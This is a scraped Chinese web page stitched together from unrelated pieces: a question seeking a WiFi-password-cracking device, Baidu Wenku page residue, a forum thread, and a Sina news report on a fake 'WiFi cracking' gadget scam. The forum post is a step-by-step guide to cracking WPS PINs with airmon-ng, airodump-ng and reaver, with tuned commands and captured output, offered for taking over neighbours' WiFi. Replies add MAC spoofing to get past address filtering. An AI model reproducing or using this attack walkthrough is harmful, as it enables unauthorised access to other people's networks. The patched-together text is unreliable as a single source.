请介绍一款远距离防身器材接受收Wifi信号并能破解密码的设备!谢谢!

网络信息技术应用与网络安全_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
网络信息技术应用与网络安全
上传于||文档简介
&&公​需​课​答​案
阅读已结束,如果下载本文需要使用0下载券
想免费下载更多文档?
定制HR最喜欢的简历
下载文档到电脑,查找使用更方便
还剩4页未读,继续阅读
定制HR最喜欢的简历
你可能喜欢还没有帐号? 赶紧
用户版块帖子
182920阅读
100%破解wifi密码~真正的黑客手段
UID:777917
在线时间4358小时
M币15725专家3
声明:本文仅供安全学习用途&&&&全文主要围绕aircrack和reaver这两个工具,与暴力破解不同,aircrack和reaver基本上100%能够得到密码,并且,无论正主随便怎样修改密码,只要我们之前得到过一次密码和pin码,就能根据pin码得到最新的密码。整个过程中,无视密码的复杂程度,即便是数字字母字符组合的也没关系的,实属破解pin码,居家旅行之必备良药。方法一.kali linux破解破除无线网卡不支持的界限,让每个人都能够爽一把1.下载kali镜像,安装双系统(我是这样干的,当然,也可以用虚拟机装,这个没有亲测,所以不知道可不可靠)镜像和双系统教程,后面会贴出来(希望大家能够完整的看完这个帖子,然后选择自己想要的方式,然后仔细看一遍相应的教程)2.打开终端,分别输入命令airmon-ng start wlan0&&&& airodump-ng mon0出现以下东西,当然,这是我这边的啦,每个人的都不一样啦,这就是查看附近有哪些wifi信号的一个非常重要的说明,只有开啦wps的才能pin出pin码和wifi密码,怎么看是不是开啦wps呢?看到下面很多54e么,如果54e后面有.,就说明开啦wps啦CH 11 ][ Elapsed: 36 s ][
04:46&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&BSSID&&&&&&&&&&&&&&PWR&&Beacons&&&&#Data, #/s&&CH&&MB&& ENC&&CIPHER AUTH ESSID&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00:0E:2E:FD:C4:BB&& -1&&&&&&&&0&&&&&&&&0&&&&0&&-1&&-1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 4C:E6:76:60:3F:20&&-13&&&&&&123&&&&&&&&0&&&&0&&11&&54e&&WPA2 CCMP&& PSK&&cuier-1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&B0:48:7A:52:F4:72&&-23&&&&&& 42&&&&&&&&0&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&FAST_52F472&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&8C:21:0A:5F:A2:FA&&-35&&&&&& 28&&&&&&&&0&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&TP-LINK_5FA2FA&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& E0:05:C53:3F:00&&-42&&&&&& 33&&&&&&&&0&&&&0&& 2&&54e. WPA2 CCMP&& PSK&&TP-LINK_D33F00&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& EC:17:2F:7D:12:1E&&-49&&&&&& 56&&&&&&&&1&&&&0&& 6&&54e. WPA2 CCMP&& PSK&&wg7788&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& B0:48:7A:5D:22:EA&&-51&&&&&& 36&&&&&&&&0&&&&0&& 6&&54e. WPA2 CCMP&& PSK&&TP-LINK_1202&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& C4:CA9:6D:6F:B0&&-52&&&&&& 30&&&&&& 10&&&&0&&11&&54e. OPN&&&&&&&&&&&&&&ChinaNet&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 8C:21:0A:8F:2F:1A&&-54&&&&&& 18&&&&&&&&0&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&hechengyv&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&E0:05:C5:C5:70:E8&&-55&&&&&& 15&&&&&&&&0&&&&0&& 4&&54e. WPA2 CCMP&& PSK&&wtangqiu&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& C8:3A:35:5518&&-55&&&&&& 20&&&&&&&&2&&&&0&& 7&&54e. WPA&&CCMP&& PSK&&Tenda_55D1D8&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 8C:21:0A:84:89:8C&&-56&&&&&& 24&&&&&&&&0&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&BATE&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& C4:CA9:6D:5F:60&&-55&&&&&& 15&&&&&&&&2&&&&0&& 6&&54e. OPN&&&&&&&&&&&&&&ChinaNet&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& EC:17:2F:54:01:2E&&-56&&&&&& 13&&&&&&&&0&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&diguadawang&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&5C:63:BF:74:56:52&&-53&&&&&& 18&&&&&&&&2&&&&0&& 1&&54e. WPA2 CCMP&& PSK&&cocohe&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 08:10:76:40:C2:92&&-58&&&&&& 21&&&&&&&&0&&&&0&& 1&&54e&&WPA2 CCMP&& PSK&&flytv&&&&&&再说说里面的一些参数BSSID:待会我们需要用到的东西,也就是所谓的MAC地址PWR:信号强度,绝对值越小,说明信号越好,越容易pin出来其他的参数就没啥好说的啦3.开始进入破解阶段啦如果上面的信号源觉得差不多啦,那么按ctrl+c终止监视然后输入如下格式代码reaver -i mon0 -b MAC -vvreaver -i mon0 -b B0:48:7A:52:F4:72 -vv但是,对于一些不同的信号源,我们一般会作出一些调整,使得pin的过程更顺利些-i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key(可以提高PJ速度)-vv 显示更多的非严重警告-d 即delay每穷举一次的闲置时间 预设为1秒-t 即timeout每次穷举等待反馈的最长时间-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死)示例:reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)应因状况调整参数(-c后面都已目标频道为1作为例子)目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1一般来说,我不喜欢在后面加-c参数比如说我的信号普通我就是reaver -i mon0 -b MAC -a -S -vv -d 2 -t 5root&&:~/soft/reaver-1.4#&&reaver&&-i&&mon0&&-b 8C:21:0A:5F:A2:FA&&-a&&-S&&-vv&&-d2&&-t 5&&Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner &&[+] Switching mon0 to channel 1[+] Waiting for beacon from 8C:21:0A:5F:A2:FA[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)[+] Trying pin [+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin [+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin [+] Sending EAPOL START request上面8位数的数字就是我们说的pin码,整个的过程,其实就是先算前面四位数,有一万种可能,如果前面四位数找到啦,整个破解过程进度直接跳到90%,哪怕你第一个码,然后pin码前四位确实是1234,那么,我只想说,你实在是人品爆发啦;前面四位数出来之后,就是后面四位数啦,需要运算1000次,所以整个加起来就是11000次啦,所以,就算人品再差,跑完11000次,密码就出来了。这里想要强调一个事,那就是速度问题,根据硬件问题,还有信号问题,pin的速度,每个人都不大一样,比如我就是比较一般,10秒一pin,这个怎么看呢?[+] 17.30% complete @&& 08:46:21 (9 seconds/pin)后面的这个就是啦4.得到最后的pin码和wifi密码[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin [+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 55276 seconds[+] WPS PIN: ';[+] WPA PSK: '************'[+] AP SSID: 'TP-LINK_5FA2FA'后面这个就是pin码和wifi密码,wifi密码我就用*号表示。一些需要注意的地方1.全过程科院随时中断,ctrl+v就行,下次想要继续运行,那么分别按最开始的步骤来就是啦,.会从进度接着开始2.如果知道pin码的前面四位,那么直接运行如下命令reaver-i mon0 -b MAC -a -vv -p XXXX(PIN 前四位数,参数加在数字前面)3.最后会生成一个wpc文件,只要有这个文件,以后随便他们怎么改密码,只要运行一下,密码就出来啦(PS:我没试过唉,按照整个原理来说,我觉得就是这样的,或者是按照知道pin码前面四位的方式来,我们知道pin码的所有八位,这样我觉得就不需要那个wpc文件啦)方法二:CD Linux系统对网卡有要求,需要8187或者3070型号的网卡,但是如果网上shopping合适的网卡,如USB网卡,那感觉绝对爽爆了这里我就不详细说明啦,因为后面给的链接,有非常详细的视频教程,视频教程中出现的工具,也全部准备好了的。
本帖提到的人:
謝謝分享,麻烦
现在在路上发现有很多无线设备
UID:834393
在线时间5156小时
M币3455专家5
如果对方开启防pin?关闭wps?100%哪里来的
LZ是转帖的,他自己压根不懂。
UID:1102450
在线时间1494小时
M币238专家1
现在的新路由大部分都有防pin码的,不是那么容易的,CD Linux我用过,破解也不是那么容易的。
UID:843512
在线时间3136小时
M币6617专家52
我的无线都是绑定MAC的,对于这种破解基本无视
UID:623764
在线时间787小时
M币6494专家5
:我的无线都是绑定MAC的,对于这种破解基本无视 ( 16:07) 连接路由后,扫描得到你的MAC,把MAC、IP修改成和你的一样,同归于尽的说~~
绑定MAC,非列表内的MAC是无法连接路由的,除非你直接上人家屋子里面有线连接
UID:623764
在线时间787小时
M币6494专家5
回 nokia5320 的帖子
:如果对方开启防pin?关闭wps?100%哪里来的[表情]  ( 15:44) 抓包、跑包。。。时间问题。。。
UID:1578347
在线时间971小时
M币2206专家3
关闭WPS并绑定MAC的路过
UID:177263
在线时间255小时
M币302专家2
回 洲上舟 的帖子
:抓包、跑包。。。时间问题。。。 ( 16:12) 如果上web认证或radius呢?
UID:1174719
在线时间590小时
M币1133专家0
LZ是转帖的,他自己压根不懂。 无线论坛老鸟路过
UID:1474035
在线时间787小时
M币2192专家30
不用时我是关路由器电源的,欢迎黑客前来蹭网。
访问内容超出本站范围,不能确定是否安全
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
您目前还是游客,请
&回复后跳转到最后一页
Code by , Time now is:01-15 02:11,
Gzip enabled&保定路边现蹭网神器 称搜千米WiFi能破解密码_新浪河北_新浪网
“蹭网神器”里面,只有一个发光二极管。
路边兜售“蹭网神器”不靠谱
  本报讯(记者&汪洋)可自动搜索1000米范围内WiFi信号,并快速破解密码建立连接,实现随时随地免费上网。近日,保定市民解先生在路边买了一个“蹭网神器”,回家发现无法使用后拆开一看,里面只有一个价值几分钱的发光二极管,他提醒人们擦亮眼睛,别再像他一样被骗。
  据解先生介绍,11月30日他去保定市东风桥一带购物时,发现路边围着一小群人,便好奇地凑上前去看个究竟。只见人群里面一个男子蹲在地上,正向围观人群推销一款“雷达WiFi终端无线接收解码器”。该男子声称,这个连着一根USB接线的白色小盒子通电后,可以自动搜索周边1000米范围内的WiFi信号,破解信号密码并建立连接,可供手机、平板电脑、笔记本电脑等终端设备随时随地免费上网。根据WiFi信号强度和密码复杂程度,可在2至180分钟内破解。
  见人们半信半疑,该男子从包内拿出一个移动电源插上“雷达WiFi终端无线接收解码器”,只见小盒子上的一个红色指示灯就开始闪烁起来。而后该男子从解先生手中借过手机打开无线连接,选择了列表中一个信号强度很好的WiFi源,并输入了密码:。果然解先生的手机一会儿就连上了无线网络,上网速度还很快。见这个“雷达WiFi终端无线接收解码器”如此神奇,解先生就掏40元买了一个。
  回到家后,解先生将“蹭网神器”接通电源,并尝试用手机无线连接上网。虽然手机显示周围的WiFi源有好几个,可像那名男子一样输入密码:后,却均无法实现连接。查看说明书后,解先生还以为是密码复杂需要长时间破解,就耐着性子等了3个多小时,但手机仍然无法“蹭网”。情急之下解先生拆开小白盒子查看,发现里面竟然只是两根电线连接着一个发光二极管。解先生这才明白自己被兜售“蹭网神器”的男子忽悠了。
  记者看到,解先生花40元购买的“蹭网神器”外表做工非常粗糙,上面全部都是英文,制造厂商等信息也统统没有。附带的一张印刷粗糙的说明书上,写有一个广东区号的联系电话。记者拨打过去,发现根本就是一个空号。
  保定市警方人士介绍说,兜售“蹭网神器”是最近出现的一种新骗局。骗子随身携带一个WiFi热点,并把密码设置为简单的数字,然后冒充被破解的WiFi信号进行演示。有的还雇一些托儿来围观购买烘托气氛,让市民放松警惕掏钱购买。其实骗子兜售的“蹭网神器”里面就一个能闪烁的发光二极管,价值只有几分钱。
12-05 10:56|分享
12-05 10:45|分享
12-05 10:30|分享
12-05 10:23|分享
12-05 09:33|分享
12-05 08:15|分享
12-05 08:01|分享
12-05 07:57|分享
12-05 07:45|分享
12-05 07:30|分享
新浪地方站

我要回帖

更多关于 远距离对讲机 的文章

 

随机推荐